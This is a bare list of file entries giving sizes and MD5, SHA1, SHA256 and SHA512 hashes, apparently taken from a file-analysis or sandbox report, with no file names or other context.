SHA512: d699339cdef3e82a80db847af71310c3fa92ed1a11b5ef9aa933ce90f9afbbedd39bc38c005b746fe2b8d4a4749852a7703e7c0bc90a513040299429805a87fd

Filesize: 1KB
MD5: 550891bb3b717c0748b16cefdc3421fe
SHA1: 0272e629a990d8d0343f39f3f265c07ea242470b
SHA256: c4b2c630fc4fc8b2e3f0e1142e060d63a4e32d419491be3cb078ee37499792f6
SHA512: 3f6c6a9695ec9e3f0159d974b6f60eb5f03a380cca297c7c82996652876c8b47b75504b4103f06cae1d2e354648b86128d7767122196f4e399a2c05981df4305

Filesize: 5KB
MD5: e4739b2bbbade2508a6d1d6235776bb2
SHA1: 08da2d7cc4ab2163928bc31569eab10c9d1fbd23
SHA256: ef9f813c03f8a1c6b085c98230af1fd5d65866e4c87b936600f99e82859dbd20
SHA512: 376881b542196fd0d16d3c5672bbb96cd302215010e3a67ec5c0057fb0d30654f6d804672efdd52c3933549225328a2d68428912547100fe4d1451234589e80f

Filesize: 6KB
MD5: fb3394b1af2dce5e03e8175286b95a64
SHA1: d56918d16d33edd1a273ccad48b4239ff2cc0400
SHA256: c892f2136114ee571094f06e9d960faafd6a1b880087196898ad662f98658201
SHA512: c6213b152e130e58003b4b341a18c41d42b52df13946aa2ce5ff5131237d8d7a8e0d08a36b3b83d2a1cfc44f5435e142eb3394033b21ef8296469bcf840c7b1f

Filesize: 16B
MD5: 46295cac801e5d4857d09837238a6394
SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Filesize: 16B
MD5: 206702161f94c5cd39fadd03f4014d98
SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Filesize: 11KB
MD5: 682fea592a0fafacc67b6fd2b4a2f17e
SHA1: eeb7ac914c991b3cbc59625577c62cf98f22ff6e
SHA256: f00c1ee32fd4add83b6ef036eb2af0014fd817d64e26f3528452abf790c28ef9
SHA512: f07bac059e5efa11a780101d32b19d46989bdcfc29ae0ebcaf70d6eefc9cafa60fc73e7779858c30d9050bbdf6784e1d9eecf357951a3e783b76d2db9e334d6c

Filesize: 64B
MD5: 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1: b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256: 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512: bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82